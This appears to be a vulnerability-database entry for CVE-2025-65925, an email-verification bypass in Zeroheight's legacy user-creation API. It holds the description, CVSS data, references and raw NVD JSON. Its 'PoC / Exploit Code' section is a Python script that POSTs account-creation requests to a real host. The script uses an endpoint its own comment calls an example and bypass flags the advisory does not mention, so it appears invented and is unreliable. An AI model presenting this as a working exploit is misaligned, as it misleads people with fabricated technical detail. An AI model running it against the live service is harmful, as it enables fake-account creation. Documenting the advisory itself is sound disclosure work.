CVE-2025-65925

Description

An issue was discovered in Zeroheight (SaaS) prior to 2025-06-13. A legacy user creation API pathway allowed accounts to be created without completing the intended email verification step. While unverified accounts could not access product functionality, the behavior bypassed intended verification controls and allowed unintended account creation. This could have enabled spam/fake account creation or resource usage impact. No data exposure or unauthorized access to existing accounts was reported.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:zeroheight:zeroheight:*:*:*:*:*:*:*:* - VULNERABLE

Zeroheight (SaaS) < 2025-06-13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-65925 PoC - Zeroheight Account Verification Bypass # This PoC demonstrates the verification bypass vulnerability in Zeroheight's legacy user creation API import requests import json import sys def exploit_zeroheight_bypass(target_url, email): """ Exploit CVE-2025-65925: Zeroheight Legacy User Creation API Verification Bypass This vulnerability allows attackers to create accounts without email verification by exploiting a legacy API pathway that bypasses intended verification controls. """ # Target API endpoint for user creation (legacy pathway) api_endpoint = f"{target_url}/api/v1/users" # Example legacy endpoint # Malicious payload to create account without verification payload = { "email": email, "username": "attacker_test_user", "password": "TestPass123!", "verify_email": False, # Bypass flag "skip_verification": True # Additional bypass mechanism } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "X-API-Version": "legacy" # Specify legacy API version } try: print(f"[*] Sending account creation request to {api_endpoint}") print(f"[*] Target email: {email}") response = requests.post(api_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 201 or response.status_code == 200: print("[+] Account created successfully without email verification!") print(f"[*] Response: {response.text}") return True else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[*] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-65925_poc.py <target_url> <email>") print("Example: python cve-2025-65925_poc.py https://zeroheight.com [email protected]") sys.exit(1) target_url = sys.argv[1] email = sys.argv[2] exploit_zeroheight_bypass(target_url, email) if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65925
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65925
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65925/
[4] VulDB https://vuldb.com/cve/CVE-2025-65925
[5] https://github.com/Sneden/zeroheight-account-verification-bypass-CVE-2025-65925

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65925", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:42.947", "lastModified": "2026-01-13T22:17:35.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Zeroheight (SaaS) prior to 2025-06-13. A legacy user creation API pathway allowed accounts to be created without completing the intended email verification step. While unverified accounts could not access product functionality, the behavior bypassed intended verification controls and allowed unintended account creation. This could have enabled spam/fake account creation or resource usage impact. No data exposure or unauthorized access to existing accounts was reported."}, {"lang": "es", "value": "Se descubrió un problema en Zeroheight (SaaS) antes del 13-06-2025. Una ruta de API de creación de usuarios heredada permitía que se crearan cuentas sin completar el paso de verificación de correo electrónico previsto. Si bien las cuentas no verificadas no podían acceder a la funcionalidad del producto, el comportamiento eludía los controles de verificación previstos y permitía la creación de cuentas no intencionadas. Esto podría haber permitido la creación de cuentas de correo no deseado/falsas o un impacto en el uso de recursos. No se informó de exposición de datos ni de acceso no autorizado a cuentas existentes."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zeroheight:zeroheight:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-06-13", "matchCriteriaId": "10A6D1AB-CE2D-40D8-99FD-16A97FE35FB6"}]}]}], "references": [{"url": "https://github.com/Sneden/zeroheight-account-verification-bypass-CVE-2025-65925", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}